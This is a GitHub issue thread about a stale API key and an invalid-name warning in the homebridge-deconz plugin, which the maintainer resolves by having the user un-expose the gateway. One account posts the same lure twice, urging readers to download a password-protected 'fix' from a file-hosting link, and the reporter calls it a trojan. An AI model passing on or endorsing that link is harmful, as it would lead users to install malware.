### ISSUE TITLE
Potentially stale api key

### ISSUE THREAD

**Issue by lhari84** [ebaauw/homebridge-deconz#229]
Hi, 
I got an issue when preparing for HB 2.0: 
To avoid warning "invalid name charactristic", I've renamed all devices that contain invalid characters and re-exposed all of these devices by removing them from HB's cached devices list once. 
So far so good, but one device makes troubles, it's the Phoscon Gateway itself: 
I've renamed it  (from "Phoscon-GW" to "Phoscon GW") on side of deCONZ, on side of Homekit and HB, but still warning in HB logs: 
![image](https://github.com/user-attachments/assets/ed3cb184-2866-4033-b76b-6b3334ebdda1)

I guess this is because in device properties, the old name still stucks here: 
![image](https://github.com/user-attachments/assets/bfd2c2c1-214e-42b0-af44-098e717109d3)

So, if i do the trick of re-exposing by deleting this device from HB cache, it causes the following problem/warning and I have no idea to get rid of it: 
![image](https://github.com/user-attachments/assets/e8a5859c-63fe-4771-8a22-07b7b7407e6f)
The one charactaristics-warning goes, but this one comes. 
Have tried it several times with different order of actions, but always the same result. For now, I have restored the snapshot where everything works fine with latest HB stable, so I could give it another try if there is any solution. 
Thank you very much in advance.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lhari84** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

No thanks, I guess a Windows trojan will not solve the issue.

**Comment by ebaauw** [comment]
See #22.  If you un-expose the gateway (using `ui`) instead of deleting the cached accessory, Homebridge deCONZ will delete the old API key.

**Comment by lhari84** [comment]
> See #22. If you un-expose the gateway (using `ui`) instead of deleting the cached accessory, Homebridge deCONZ will delete the old API key.

Thank you so much, this solved my issue! 
Sorry for not checking closed  issues, Just googled it and have not found anything this way.
